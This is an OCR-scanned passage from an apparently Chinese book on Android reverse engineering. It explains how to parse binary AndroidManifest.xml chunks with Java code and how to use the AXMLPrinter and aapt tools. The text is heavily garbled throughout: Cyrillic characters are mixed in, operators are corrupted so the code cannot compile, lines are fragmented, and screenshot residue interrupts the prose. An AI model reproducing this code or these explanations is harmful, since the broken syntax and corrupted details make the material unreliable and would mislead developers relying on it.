name-"taskAffinity" id-"0x01010012" /- 
name-"multiprocess" id-")0xD0101001353" /- 
name-—-"finishOnTaskLaunch" id-")0xD0i1010014" 
name-"olearTaskOnLaunch" id-"O0xD1010015" 


/T 
/T- 
/T 
/T- 
id=" 0х01010004 " 


name-"tnheme" 
name-"label" 


£ > 
/M 
> 

/> 

^> 

/> 
й > 


^> 


/> 
f> 


name-"stateNotNeeded" id-")0x01010016" /> 
name-"excludeFromRecents" id-"Dx01010017" 
name-"authorities" id-"0x01010018" /- 
name-"syncable" id-"0x01010019" /- 


«public 
«public 
«public 
«public 


type-"attr" 
type-"attr" 
type-"attr" 
type-"attr" 


/M 


用 上 面 解析 到 的 ID 去 public.xml 文 件 中 查询 一 下 ， 得 到 如 下 结果 : 


"а 


«public 


^> 


19=" 0x010272 0000" 
б > 
/M 


«public /> 
xpublic 
xpublic 
«public 


type="id" 
type="id" 
type="id" 
type-"id" 


name=" background" 
name=" checkbox" id="0x01020001" 
name=" content" id-"Ü0x01020002" 
name-"edit" id-"0x01020003" /- 


查 到 了 ， 是 vetsionCode， 这 个 系统 资源 ID 存放 的 文件 public.xzml 是 很 重要 的 ， 后 面 在 讲解 ftesoutce.atsc 文 件 格式 的 时 候 还 会 用 


到 。 


5.2.4 解析 Start Namespace Chunk 


这 个 Chunk 主 要 包含 一 个 AndroidManifest 文 件 中 的 命令 空间 的 内 容 ，Android 中 的 XML 都 是 采用 Schema 格式 的 ， 所 以 肯 
定 有 Prefix 和 URI 的 ， 如 图 5-5 所 示 。 


图 5-5 Start Namespace Chunk 


XML 格式 有 两 种 : DTD 和 Schema。 
ВВР: 
- Chunk Туре: Сһипка 278, E] £ vy ^M £ 2 0х00100100. 
- Chunk Size: Chunkf4 Ko], wgAe R3. 
: Line Number: 在 AndroidManifest 文 件 中 的 行 号 ， 四 个 字 节 。 
: Unknown: 未 知 区 域 ， 四 个 字 节 。 
Prefix: 命名 空间 的 前 级 (在 字符 串 中 的 索引 值 ) ， 比 如 : android. 
‚Оп: 命名 空间 的 URT (在 字符 串 中 的 索引 值 ) ， 比 如 : http://schemas.android.com/apk/res/android。 


解析 代码 如 下 : 


/** 
х 解析 StartNamespace Chunk 
* (àparam byteSrc 
ui 
public static void parseStartNamespaceChunk(byte[] byteSrc)t 
/ / 获取 ChunkTag 
byte[] chunkTagByte - Utils.copyByte(byteSrc, 0, 4); 
System.out.println(Utils.bytesToHexString(chunkTagByte)); 
/ / 获取 ChunkSize 
byte[] chunkSizeByte - Utils.copyByte(byteSrc, 4, 4); 
int chunkSize = Utils.byte2int(chunkSizeByte); 
System.out.println("chunk size:"-«chunkSize); 


// 解析 行 号 

byte[] lineNumberByte = Utils.copyByte (byteSrc, 8, 4); 
int lineNumber = Utils.byte2int(lineNumberByte); 
System.out.println("line number:"«lineNumber); 


// 解析 prefix( X H T € jb E B E (1 Je W| BJ UAE DJ FFFF, XDJA ) 
byte[] prefixByte - Utils.copyByte(byteSrc, 16, 4); 
int prefixlIndex = Utils.byte2int (prefixByte); 

String prefix = stringContentList.get (prefixIndex); 
System.out.println("prefix:"-«prefixIndex); 
System.out.println("prefix str:"-«prefix); 


/ / 解析 URI 

byte[] uriByte - Utils.copyByte(byteSrc, 20, 4); 
int urilndex - Utils.byte2int(uriByte); 

String uri = stringContentList.get (uriIndex); 
System.out.println("uri:"-«uriIndex); 
System.out.println("uri str:"-uri); 


uriPrefixMap.put(uri, prefix); 
prefixUriMap.put(prefix, uri); 


解析 的 结果 如 下 : 


Parse XML Content------------- 

chunk tag:00 10 01 00 

parse start namespace 

o0 10 01 ӨӨ 

chunk size:24 

line number:2 

prefix:12 

prefix str:android 

unri:13 

uri str:http://schemas.android.com/apk/res/android 


jx EBRSPJ ELSE. E TET JT Te String 2 ХУЛУУ 5 (Е, ОСЕ ЈЕ, — "C XMLrPUIBER S27 T 852A 2508], 
所 以 这 里 用 Map 和 存储 Prefix 和 URI 对 应 的 关系 ， 后 面 在 解析 书 点 内 容 的 时 候 会 用 到 |。 


5.2.5 ”解析 Start Tag Chunk 


这 个 Chunk 主 要 是 人 存放 AndroidManifest.xml 中 的 标签 信息 ， 是 最 核心 的 内 容 ， 当 然 也 是 最 复杂 的 内 容 ， 如 图 5-6 所 示 。 


Chunk Туре(0х00100102) 
Chunk Size 
Line Number 


Class Attribute 
Attributes Attribut 


5-6 Start Tag Chunk 25 J 


说 明 如 下 : 
: Chunk Type: Chunk 的 类 型 ， 固 定 四 个 字 节 : 0x00100102。 
Chunk Size: Chunk 的 大 小 ， 固 定 四 个 字 节 。 
: Line Number: 对 应 于 AndtoidManifest 中 的 行 号 ， 四 个 字 节 。 
: Unknown: 未 知 领 域 ， 四 个 字 节 。 


: Namespace Uri: 这 个 标签 用 到 的 命名 空间 的 URI， 比 如 用 到 了 android 这 个 前 级 ， 那 么 就 需要 


用 http://schemas.android.com/apk/res/android 这 个 URI 去 获取 ， 四 个 字 节 。 
Name: 标签 名 称 ( 在 字符 囊 中 的 索引 值 ) ， 四 个 字 节 。 


: Flags: 标签 的 类 型 ， 四 个 字 节 ， 比 如 是 开始 标签 还 是 结束 标签 等 。 


· Attribute Count: 标签 包含 的 属性 个 数 ， 四 个 字 节 。 
: Class Atrribute: 标签 包含 的 类 属性 ， 四 个 字 节 。 


‚ Attributes: 属性 内 容 ， 每 个 属性 算是 一 个 Entry，Entry 是 大 小 为 5 的 字 节 数组 
INamespace，URI，Name，ValueStrineg，Data]， 在 解析 的 时 候 需 要 注意 第 四 个 值 ， 要 做 一 次 处 理 : 需要 右 移 24 位 。 所 以 这 个 字段 
的 大 小 是 : “属性 个 数 X5X4 个 字 节 。 


解析 属性 代码 如 下 : 


// 解析 属性 
// 这 里 需要 注意 的 是 每 个 属性 单元 都 是 由 五 个 元 素 组 成 ， 
// 每 个 元 素 占 用 四 个 字 节 :namespaceuri，name，valuestrind，type，dqata 
// 在 获取 到 type 值 的 时 候 需 要 右 移 24 位 
ArrayList«AttributeData» attrList = new ArrayList«AttributeData»(attrCount); 
for(int iz0;i«attrCount;1i-c-«)( 
Integer[] values = new Integer[5]; 
AttributeData attrData - new AttributeData(); 
for(int j20;j«5;j-«-)( 
int value = Utils.byte2int(Utils.copyByte(byteSrc, 36+1*20+)*4, 4)); 
switch(j)( 
case 0: 
attrData.nameSpaceUri - value; 
break; 
case 1: 
attrData.name - value; 
break; 
case 2: 


attrData.valueString - value; 
break; 
case 3: 
value - (value »» 24); 
attrData.type - value; 
break; 
case 4: 
attrData.data - value; 
break; 
} 
values[j] = value; 
} 
attrList.add(attrData); 


可 以 看 到 ， 第 四 个 值 需要 额外 的 处 理 一 下 ， 就 是 需要 右 移 24 位 。 解 析 完 属性 之 后 ， 可 以 得 到 一 个 标签 的 名 称 、 属 性 名 称 、 
属性 值 : 


for(int i=0;i<attrCount;i++)í 

if(attrList.get(i).nameSpaceUri != -1)í 
System.out.println("nameSpaceUri:"«*stringContentlist.get(attrlist.get(i).nameSpaceUri)); 

Jelsei 
System.out.println("nameSpaceUri -- null"); 

} 

if(attrList.get(i).name !- -1){ 
System.out.println("name:"«stringContentlist.get(attrlist.get(i).name)); 

је15е{ 
System.out.println("name == null"); 

} 

if(attrlist.get(i).valueString !- -1){ 
System.out.println("valueString:"«*stringContentlist.get(attrlist.get(i).valueString)); 

Jelsei 
System.out.println("valueString -- null"); 

} 

System.out.println("type:"+AttributeType.getAttrType(attrList.get(i).type)); 

System.out.println("data:"+AttributeType.getAttributeData(attrLlist.get(i))); 


看 解析 的 结果 : 


attr count:5 
nameSpaceUri:http: //schemas.android.com/apk/res/android 
name: versionCode 


valueString -- null 
type:ATTR FIRSTINT 
data:2 


nameSpaceUri:http: //schemas.android.com/apk/res/android 
name: versionName 
valueString:1.1 

type:ATTR STRING 

data:1.1 

nameSpaceUri -- null 
name:package 
valueString:com.qq.e.demo 
type:ATTR STRING 
data:com.qq.e.demo 
nameSpaceUri -- null 
name:platformBuildVersionCode 
valueString:21 

type:ATTR FIRSTINT 

data:21 


标签 manifest 包 合 的 属性 如 下 : 


«manifest xmlns:android-"http://schemas.android.com/apk/res/android" 
package- "com.qq.e.demo" 
android:versionCode- "2" 
android:versionName-"1.1" » 


这 里 有 几 个 问题 需要 解释 一 下 : 
1) 为 什么 看 到 的 是 三 个 属性 ， 但 是 解析 打印 的 结果 是 5 个 ? 
因为 系统 在 编译 apk 的 时 候 ， 会 添加 两 个 属性 : platformBuildVersionCode 和 platform-BuildVersionName。 


这 是 友 布 的 设备 版 本 号 和 版 本 名 称 : 


<?xml version="1.0" encoding-"utf-8"?» 

<manifest xmls:android:"http://schemas.android.com/apk/res/android" 
android:versionCode="2" 

android:versionName="1.1" 

package-"com.qq.e.demo" 

platformBuildVersionCode-"21" 

platformBuildVersionName-"5.0.1-1624448"» 


这 个 是 解析 之 后 的 结果 。 
2) 当 没 有 android 这 样 的 前 缀 时 ，NamespaceUri 是 null。 


nameSpaceUri == null 
name:package 
valueString:com.qq.e.demo 
type:ATTR STRING 
data:com.qq.e.demo 
nameSpaceUri -- null 
name:platformBuildVersionCode 
valueString:21 

type:ATTR FIRSTINT 

data:21 

nameSpaceUri -- null 
name:platformBuildVersionName 
valueString:5.0.1-1624448 
type:ATTR STRING 
data:5.0.1-1624448 


3) 当 dataType 不 同 ， 对 应 的 data 值 也 不 同 ， 如 下 所 示 : 


public static String BetAttributeData(AttributeData data){ 
if (data.type == ATTR STRING) í 


return ParseChunkUtils.getStringContent(data.data); 


if (data.type -- ATTR ATTRIBUTE) ( 
return String.format("?965$08X" , getPackage(data.data),data.data); 


if (data.type -- ATTR REFERENCE) ( 
return String.format("(9965$508X" , getPackage(data.data),data.data); 


if (data.type -- ATTR FLOAT) ( 
return String.valueOf(Float.intBitsToFLloat(data.data)); 


if (data.type -- ATTR HEX) ( 
return String.format("0x*X08X" ,data.data); 


if (data.type -- ATTR BOOLEAN) ( 
return data.data!-0?"true":"false"; 


if (data.type -- ATTR DIMENSION) ( 
return Float.toString(complexToFLoat(data.data))- 
DIMENSION UNITS[data.data & COMPLEX UNIT MASK]; 


if (data.type == АТТА FRACTION) { 
return Float.toString(complexToFLoat(data.data))- 
FRACTION UNITS[data.data & COMPLEX UNIT MASK]; 


if (data.type »- ATTR FIRSTCOLOR && data.type «- ATTR LASTCOLOR) ( 
return String.format("#%@8X",data. data); 


if (data.type >= ATTR FIRSTINT && data.type <= ATTR LASTINT) í 
return String.valueOf(data.data); 


h 
return String.format("«0xX*XX, type 0x9$$02X»",data.data, data.type); 


这 个 方法 就 是 用 来 转 义 的 ， 后 面 在 解析 resource.arsc 的 时 候 也 会 用 到 这 个 方法 。 


4) 每 个 属性 理论 上 都 会 售 有 一 个 NamespaceUri， 这 也 决定 了 属性 的 前 缀 Prefix 默 认 都 是 Android， 但 是 有 时 候 会 自 定 义 一 
个 控件 ， 这 时 候 就 需要 导入 NamespaceUri 和 Prefix 了 。 所 以 一 个 XML 中 可 能 会 有 多 个 Namespace， 每 个 属性 都 会 包含 


NamespaceUri, 


х 解析 EndTag Chunk 

х (àparam byteSrc 

Ыі 

public static void parseEndTagChunk(byte[] byteSrc)t 

byte[] chunkTagByte = Utils.copyvByte(byteSrc, 0, 4); 
System.out.println(Utils.bytesToHexString (chunkTagByte)); 
byte[] chun kSizeByte - Utils.copyByte(byteSrc, 4, 4); 
int chunkSize - Utils.byte2int(chunkSizeByte); 
System.out.println("chunk size:"-«chunkSize); 


// 解析 行 号 

byte[] lineNumberByte = Utils.copyByte (byteSrc, 
int lineNumber = Utils.byte2int(lineNumberByte); 
System.out.println("line number:"-«lineNumber); 


8, 4); 


/ / 解析 prefix 

byte[] prefixByte = Utils.copyByte (byteSrc, 8, 
int prefixIndex = Utils.byte2int(prefixByte); 
/ / 这 里 可 能 会 返回 -1， 如 果 返 回 -1 的 话 ， 那 就 是 说 没有 prefix 


4); 


if(prefixIndex 
System. out 
System. out 
}else{ 
System. out 


// 解析 Uri 
byte[] uriByte 
int uriIndex = 
if(urilndex !- 
System. out 
System. out 
}е1ве{ 
System.out 


/ / 解析 TagName 
byte [ 


tagNameByte = Utils.copyByte (byteSrc, 


I= -1 && prefixlindex«stringContentList.size())( 


.println("prefix:"+prefixIndex); 
.println("prefix str:"+stringContentList.get (prefixIndex)); 


.println("prefix null"); 


= Utils.copyByte(byteSrc, 16, 4); 
Utils.byte2int (uriByte); 
-1 && prefixIndex«stringContentList.size())í( 


.println("uri:"-«uriIndex); 
.println("uri str:"-«stringContentList.get(uriIndex)); 


Drintin(i'urri null"); 


20, 4); 


System.out.printlin(Utils.bytesToHexString (tagNameByte)); 


int tagNameIndex - 


String tagName 


if(tagNameIndex 
System.out. 
System.out. 


jelse( 


Utils.byte2int(tagNameByte); 

= stringContentList.get(tagNameIndex); 
-1)( 

println("tag name index:"+tagNamelIndex); 
println("tag name str:"-«tagName); 


System.out.println("tag name null"); 


xmlSb.append(createEndTagXml (tagName)); 


在 解析 的 时 候 ， 需 要 做 一 个 循环 操作 : 


/** 
* 开始 解析 XmJ 的 正文 内 容 Chunk 
* @рагат byteSrc 
"T 
public static void parseXmlContent(byte[] byteSrc)( 
while(!isEnd(byteSrc.length))( 
byte[] chunkTagByte - Utils.copyByte(byteSrc, nextChunkOffset, 4); 
byte[] chunkSizeByte = Utils.copyByte(byteSrc, nextChunkOffset«A, 4); 
int chunkTag - Utils.byte2int(chunkTagByte); 
int chunkSize - Utils.byte2int(chunkSizeByte); 
System.out.println("chunk tag:"4«Utils.bytesToHexString(chunkTagByte)); 
switch(chunkTag)1 
case ChunkMagicNumber.CHUNK STARTNS: 
System.out.println("parse start namespace"); 
parseStartNamespaceChunk(Utils.copyByte(byteSrc, nextChunkOffset, chunkSize)); 
break; 
case ChunkMagicNumber.CHUNK STARTTAG: 
System.out.println("parse start tag"); 
parseStartTagChunk(Utils.copyByte(byteSrc, nextChunkOffset, chunkSize)); 
break; 
case ChunkMagicNumber.CHUNK ENDTAG: 
System.out.println("parse end tag"); 
parseEndTagChunk(Utils.copyByte(byteSrc, nextChunkOffset, chunkSize)); 
break; 
case ChunkMagicNumber.CHUNK ENDNS : 
System.out.println("parse end namespace"); 
parseEndNamespaceChunk(Utils.copyByte(byteSrc, nextChunkOffset, chunkSize)); 
break; 
} 
System.out.println( "++++++++++++++++++++++++" ) ; 
nextChunkOffset += chunkSize; 


} 


System.out.println("parse xml:Nn"+xmLSb.toString()); 


因为 Android 中 在 解析 XML 的 时 候 提 供 了 很 多 种 方式 ， 但 是 这 里 没有 用 任何 一 种 万 式 ， 而 是 用 纯 代码 编写 的 ， 所 以 用 一 个 循 
环 来 人 疡 历 解析 Tag。 其 实 这 种 方式 类 似 于 用 SAX 和 解析 XML， 这 时 候 本 节 开 头 提 到 的 Flag 字 段 束 大 有 用 途 了 。 这 里 还 做 了 一 个 工作 
就 是 将 解析 之 后 的 XML 格 式 化 一 下 ， 如 下 所 示 : 


private static String createStartTagXml(String tagName, List<AttributeData> attrList){ 
StringBuilder tagSb = new StringBuilder(); 
if("manifest".equals(tagName))( 
tagSb.append("«manifest xmls:"); 
StringBuilder prefixSb - new StringBuilder(); 
for(String key : prefixUriMap.keySet())1 
prefixSb.append(key-" :XV""«prefixUriMap.get(key)*"X""); 
prefixSb.append("Xn"); 
} 
tagSb.append(prefixSb.toString()); 
уе1<$е{ 
tagSb.append("<"+tagName); 
; 


/ /构建 属性 值 
if(attrList.size() == Ө){ 
tagSb.append(">Nn"); 
}е15е{ 
+ав5Ь.аррепа( "\п"); 
for(int i-0;i«attrlist.size();i«-*)( 
AttributeData attr = attrlist.get(i); 
String prefixName = uriPrefixMap.get(attr.getNameSpaceUri()); 
/ REFR EMERARA RANA 
if(prefixName == пи11){ 


prefixName = ""; 
} 
tagSb.append(" 7); 
tagSb.append(prefixName«-(prefixName.length() > 0 ? ":" : "")«attr.getName()*"-"); 


tagSb.append("V""«AttributeType.getAttributeData(attr)*"X"") ; 
if(i == (attrlist.size()-1))( 
tagSb.append("»"); 


} 
tagSb.append("Nn"); 


} 


return tagSb.toString(); 


一 一 


难度 不 大 ， 这 里 也 融 不 继续 解释 了 。 有 一 个 地 方 需要 优化 ， 融 是 可 以 利用 LineNumber 属 性 来 精确 到 格式 化 后 文件 的 行 数 ， 
不 过 这 个 工作 量 有 点 大 ， 这 里 束 不 做 了 。 有 兴趣 的 同学 可 以 考虑 一 下 ， 格 式 化 完 之 后 的 结果 如 下 : 


@ i00 мч т\л Ë Ú N P @ X ою ч GA QQ ъъ UNEO Q осо чт Un Ú N P O  @ чт QV Ë QU N P 


<?xml version-"1.0" encoding="utf-8" 


?> 


«manifest xmls:android:"http://schemas.android.com/apk/res/android" 


android:versionCode-"2" 
android:versionName-"1.1" 
package- "com. qq. e. demo" 
platformBuildVersionCode-"21" 


platformBuildVersionName-"5.0.1-1624448"» 


«uses-permission 
android:name- "android. permission 
</uses-permission> 
<uses-permission 
android:name= "android. permission 
</uses-permission> 
<uses-permission 
android:name= "android. permission 
k/uses-permission> 
<uses-permission 
android:name= "android. permission 
</uses-permission> 
<uses-permission 
android:name- "android. permission 
</uses-permission> 
<uses-permission 
android:name- "android. permission 
</uses-permission> 
<uses-permission 
android:name-"android.permission 
«/uses-permission» 
«uses-sdk 
android:minSdkVersion-"8"» 
«/uses-sdk» 
«application 
android:theme- "97F070001 " 
android:label-"97F060000" 
android:icon-"97F020001" 
android:debuggable-"true" 
android:allowBackup-"true"» 
«service 


android:name-"com.qq.e.comm.Down 


-INTERNET"» 


.ACCESS NETWORK STATE"» 


.ACCESS WIFI STATE"» 


.READ PHONE STATE"» 


.ACCESS COARSE LOCATION"» 


.ACCESS COARSE UPDATES"» 


-WRITE EXTERNAL STORAGE "> 


LoadService" 


285062 BUR 1 ӨЗУ ТЖ. 


` 


还 
对 应 上 


H 


一 个 题 ， 


有 一 个 问 


这 个 资源， 参见 下 一 草 。 


就 是 看 到 还 有 很 多 @7F070001 这 类 的 东西 ， 


` 


这 


AN 一 一 


其 这 


# 


实 是 资源 1d， 


当 发 现 可 以 解析 AndroidManifest 文 件 了 ， 那 么 同样 也 可 以 解析 其 他 的 XML 文 件 : 


Parse XML Header 


magic number:00 08 ӨӨ ӨЗ 


хт1 


Parse String Chunk 


size:00 00 01 d4 


string chunktag:00 1с 00 01 
chunk size:248 

count:8 

start:68 

517е:11822 

Exception in thread "main" java.lang.NullPointerException 
at java.lang.String.«init»(Unknown Source) 

at com.wjdiankong.parsexml.ParseChunkUtils.parseStringChunk(ParseChunkUtils. java:78) 
at com.wjdiankong.parsexml.ParseMain.main(ParseMain. java:38) 


у 


125 


需要 解析 完 resource.arsc 文 件 之 后 ， 才 


时 解析 其 他 XML 时 报错 了 ， 定 位 代码 友 现 是 在 解析 String Chunk 的 地 万 报错 了 ， 修 改 如 下 : 


PA 
H 


b 
b 


/** 
ж 此 处 的 代码 是 用 来 解析 资源 文件 xmJ 的 
*/ 
int stringStart = Өө; 
int index = 0; 
while(index < chunkStringCount){ 
byte[] stringSizeByte = Utils.copyByte(chunkStringContentByte, stringStart, 2); 
int stringSize = (stringSizeByte[1] & @x7F); 
System.out.println("string size:"+Utils.bytesToHexString(Utils.int2Byte(stringSize))); 
if(stringSize != @)í 
/ /这 里 注意 是 UTF - 8 编码 的 
String val = ""; 


+гу{ 
val = new String(Utils.copyByte(chunkStringContentByte, stringStart+2, stringSize), "utf-8"); 


ycatch(Exception е){ 
System.out.println("string encode error:"+e.toString()); 
stringContentl ist.add(val); 
jelsei( 
stringContentlist.add(""); 
stringStart += (stringSize*3); 
index; 


h 


for(String str : stringContentLlist)( 
System.out.println("str:"«str); 


)| 


因为 其 他 的 XML 中 的 字符 串 格 式 和 AndroidManifest.xml 中 的 不 一 样 ， 所 以 这 里 需要 单独 解析 一 下 : 


parse хт1: 

«?xml version="1.@" encoding-"utf-8"?» 

«accessibility-service 
android:accessibilityEventTypes-"0x00000040" 
android:accessibilityFeedbackType-"0x00000002" 
android:notificationTimeout-"100" 
android:canRetrieveWindowContent-"true"» 

«/accessibility-service» 


IE DAL ја ЈИ У. 


在 肥 编 译 的 时 人 息 ， 有 时 候 只 想 反 编译 AndroidManifest 内 容 ， 所 以 ApkTool 工 具 束 有 点 繁琐 了 ， 不 过 网 上 有 个 已 经 写 好 了 的 
工具 AXMLPrinter.jar， 这 个 工具 很 好 用 : 


Java -jar AXMLPrinter.java xxx.xml »demo.xml 


将 xxx.xml 解 析 之 后 输出 到 demo.xml 中 即 可 。 

提示 : AXMLPrinterjar 工 具 下 载 地址 : 
http://download.csdn.net/detail/Jiangwei0910410003/9415323 
源 代码 下 载 地 址 : 
http://download.csdn.net/detail/jiangwei0910410003/9415342 
AXMLPrinter.jar LEME 5-7, 


从 项 目 结 构 可 以 发 现 ， 它 用 的 是 Android 中 自 带 的 Pull 解 析 XML 的 ， 主 函数 是 : 


public static void main(String[] arguments) í 
arguments = new String[1]; 
arguments[0] = "xmltest/activity banner demo.xml"; 
if (arguments.length«1) ( 
Log("Usage: AXMLPrinter «binary xml file»"); 
return; 


) 


+гу { 
AXmlResourceParser parser-new AXmlResourceParser(); 


parser.open(new FilelnputStream(arguments[0])); 
StringBuilder indent-new StringBuilder(10); 
final String indentStep-" g- 
while (true) { 
int type-parser.next(); 
if (type==XmlPullParser.END DOCUMENT) { 
break; 
h 
switch (type) { 
case XmlPullParser.START DOCUMENT: 


t 
Log("«?xml version=N"1.@N" encoding-V"utf-8X"?»"); 
break; 

} 

case XmlPullParser.START TAG: 

t 


Log("%s<%s%s" , indent, 
getNamespacePrefix(parser.getPrefix()),parser.getName()); 
indent.append(indentStep); 


int namespaceCountBefore-parser.getNamespaceCount(parser.getDepth()-1); 
int namespaceCount-parser.getNamespaceCount (parser.getDepth()); 
for (int i-namespaceCountBefore;i!-namespaceCount;-4i) í 


Loa( "%sxmlns :%s=\"%s\"". 


ү = AndroidXrnlPrinter 


4 585 src 
а Н 


android.content.res 


J] ChunkUtil.java 
IJ) IntReader.Java 
JJ] StringBlock.java 


> jJ] AXmlResourceParser java 


JJ] XmlResourceParser.java 


Р android.util 
|J] AttributeSet.Java 
J] TypedValue.Java 


а ПВ org.xmlpull.v1. 
J] XmlPullParser.java 


5 XmlPullParserException.java 
> 4J] XmlPullParserFactory.java 


J] XmlSerializer.java 


5-7  AXMLPrinter2j EJ 


LZ 
和 资料， 其实 就 是 将 Android 中 的 资源 文件 打包 成 resource.arsc 即 可 ， 参 见 图 5-8。 


诉 大 家 一 件 事 ， 对 上 面 的 解析 工作 有 一 个 更 简单 的 方法 ， 那 就 是 aapt 命 令 。 


天 于 这 个 aapt 是 干什么 的 ， 网 


assets 


res 
file-1 file-2 AndroidiVianifest.xml animator anim color drawable 
file-3 layout menu raw values xml 
aapt 
| | 
= 
th id compiled res which have id 
res with id 
aapt aapt ue animator anim calor drawable 
layout menu values xml 
aapt | aapt 
| | 
АРК 


assets AndroidManifest.xml(icompiled) resources.arsc Rjava res 


图 5-8 aapt 工 具 


类 型 为 res/animator、res/anim、res/color、res/drawable ( 非 Bitmap 文 件 ， 即 非 .png、.9.png、.jpg、.gif 文 件 ) 、 
res/layout、resmenu、res/values 和 res 人 /xml 的 资源 文件 均 会 从 文本 格式 的 XML 文件 编译 成 二 进 制 格式 的 XML 文件 。 


要 从 文本 格式 编译 成 二 进 制 格式 的 原因 如 下 : 


二 进 制 格 式 的 XML 文件 占用 空间 更 小 。 这 是 由 于 所 有 XML 元 素 的 标签 、 属 性 名 称 、 属 性 值 和 内 容 所 涉及 的 字符 串 都 会 被 
统一 收集 到 一 个 字符 串 资 源 池 中 去 ， 并 且 会 去 重 。 有 了 这 个 字符 串 资源 池 ， 原 来 使 用 字符 串 的 地 方 就 会 被 替换 成 一 个 索引 到 字符 
串 资 源 池 的 整数 值 ， 从 而 可 以 减少 文件 的 大 小 。 


进 制 格式 的 XML 文件 解析 速度 更 快 。 这 是 由 于 二 进 制 格式 的 XML 元 素 里 面 不 再 包含 有 字符 串 值 ， 因 此 就 避免 了 进行 字 
符 串 解析 ， 从 而 提高 速度 。 


将 XML 资源 文件 从 文本 格式 编译 成 二 进 制 格式 ， 解 决 了 空间 占用 以 及 解析 效率 的 问题 ， 但 是 对 于 Android 资 源 管理 框 以 来 
说 ， 这 只 是 完成 了 其 中 的 一 部 分 工作 。Android 资 源 省 理 框 染 的 另外 一 个 重要 任务 就 是 要 根据 资源 1D 来 快速 找到 对 应 的 资源 。 


那么 下 面 用 aapt 命 令 查 看 一 下 。aapt 命 令 在 AndroidSdk 目 录 中 ， 如 图 5-9 所 示 。 


Hu + 新 建立 件 去 


k ЖЕ (С) + Users k i k AppData > Local k Android > sdk k build-tools k 21.12 > 


Дф lib 2014/12/11 3:25 ЖЕ 
| renderscript 2014/12/11 3:25 — Xf 
2014/12/11 3:25 应 用 程序 1,432 KB 
i^ aidl.exe 2014/12/11 3:25 应 用 程序 318 KB 
[п] arm-linux-androideabi-Id.exe 2014/12/11 3:25 应 用 程序 3,702 KB 
[н] bcc compat.exe 2014/12/11 3:25 应 用 程序 146 KB 
二 demoa.txt 2016/2/18 18:19 kuis 27,189 KB 
2014/12/11 3:25 应 用 程序 228 KB 
| dx.bat 2014/12/11 3:25 Windows ЖА... 3 KB 
i3 i686-linux-android-ld.exe 2014/12/11 3:25 HATE 3,702 KB 
国 | Jack.Jar 2014/12/11 3:25 Executable Jar File 8,420 КВ 
| 国 | plljar 2014/12/11 3:25 Executable Jar File 2,881 KB 
Ы Hbbcc.dll 2014/12/11 3:25 应 用 程序 扩展 342 KB 
| libbcinfo.dll 2014/12/11 3:25 ”应 用 程序 扩展 606 KB 
|  Hbc++.so 2014/12/11 3:25 SO xt 1,281 KB 
8) libclang.dll 2014/12/11 3:25 ШЕ ЕТЖ 13,275 КВ 
(| libLEVM.dll 2014/12/11 3:25 АРАА БЕ 22 063 KB 
[п] |lvm-rs-cc.exe 2014/12/11 3:25 应 用 程序 1,197 КВ 
| | mainDexClasses 2014/12/11 3:25 NE 5 KB 
mainDexClasses.bat 2014/12/11 3:25 Windows ЖЕШКЕ... 4 KB 
| | mainDexClasses.rules 2014/12/11 3:25 RULES 4% 1 KB 
E] mipsel-linux-android-Id.exe 2014/12/11 3:25 应 用 程序 1,799 КВ 
Ej NOTICE, txt 2014/12/11 3:25 xe /11 KB 
| | runtime.properties 2014/12/11 3:25 PROPERTIES 文件 1 КВ 
| | source.properties 2014/12/11 3:25 PROPERTIES =+ 17 KB 
2014/12/11 3:25 ”应 用 程序 205 KB 


图 5-9 ”aapt 命 令 的 目录 


看 到 路 径 了 : Android SDK 目 录 /build-tools/ 下 ， 这 个 目录 下 全 是 Android 中 构建 apk 的 所 有 工具 ， 再 看 一 下 这 些 工具 的 用 
XR, 参见 图 5-10。 


襄 明 如 下 : 
- aapt.exe 生 成 R.java 类 文件 。 
- aidl.exe 把 .aidl 转 成 .java 文 件 (如 果 没 有 aidl， 则 跳 过 这 一 步 ) 。 


.javac.exe 编 译 .java 类 文件 生成 class 文 件 。 


Build process 


图 5-10 жарк т А. 


dx.bat 命 令 行 脚本 生成 classes.dex 文 件 。 
.aapt.exe 生 成 资源 包 文 件 (包括 tes、assets、andtoidmanifest,xml 等 ) 。 
-apkbuilder.bat 生 成 未 签名 的 apk 安 装 文件 。 
:atfsignet.exe 对 未 签名 的 包 进 行 apk 签 名 。 
原来 可 以 不 借助 任何 IDE 工 具 也 是 可 以 打出 一 个 apk 包 的 。 
继续 看 aapt 命 令 的 用 法 : 
aapt 1 -a apk 名 称 > demo.txt 


将 输入 的 结果 定向 到 demo.txt 中 ， 如 图 5-11 所 示 。 


:Users™"ijiangweil—g»cdq С: sUsers"wjliangueil-g"Desktop"s 
:*sersjiangweili-g*Dezsktop?aapt 1 -a demo.apk > demo. txt 
:slsers"wjlancqgue1il-g"sDesktop>start demo.txt 


:JUSsSehs jiangwe II 一 可 DesKktoDoDD> 
_| demo.txt - 记事 本 


MHAPA За (Е) 格式 (DO) же) s*FED(H) 


spec resource OxTf0S0003 tinker. sample. android:id/cleanPatch: #1 ағ=5=0х00000000 

spec resource ÜxTfüS0004 tinker. sample. android:id/killSelf: flags-üxü0000000 

spec resource ÜxTfÜü80005 tinker. sample. android:id/showInfo: flags-üxü0000000 

config (default) :| 
resource 0х7 ҒОЕО000 tinker. sample. android:id/textView: t-ÜüxlZ 4=0х00000000 (s-0x0008 r-C 
resource ÜxTfÜSO0001 tinker. sample. android:id/loadPatch: 1=0х12 4=0х00000000 (s-0x0008 r= 
resource ÜxTfÜB0002 tinker. sample. android:id/loadLibrary: 1=0х12 d-0x00000000 (==0х0008 
resource QxTF080003 tinker. sample. android:id/cleanPatch: 1=0х1% 4=0х00000000 (s=0x0008 r 
resource 0х7Е080004 tinker. sample. android:id/killSelf: t-ÜxlZ 4=0х00000000 (==0х0008 r-C 
resource ÜxTfÜ8Ü0005 tinker. sample. android:id/showInfo: t-Üüx12 4=0х00000000 (s-0x0008 r-C 


Android manifest: 
N: android-http://schemas. android. com/apk/res/android 
Е: manifest (line-2) 
А: package- tinker. sample. android” (Raw: "tinker. sample. android”) 
h: platformBuildVersionCode-itype 0х10)0х17 (Raw: “2371 
А: platformPuildVersionlName- 6.0-21686767 ^ (Raw: "8.0-2186T6T") 
E: usez-sdk {1іпе=5) 
А: android:minSdkVersion(OüxO0l01020c)- (type Oxl0J0xf 
А: android:targetSdkVersioniOxOl0102T0)-(type Oxl0J0x18 
E: uses-permission (line=7) 
А: android:name (OxO01010003J-" android. permission. WRITE EXTERNAL STORAGE" (Raw: "android. per 
E: uses-permission (line-8) 


А: апігоі 4: папе(0х01010003)= android. permission. READ EXTERNAL STORAGE" (Raw: "android. pern 


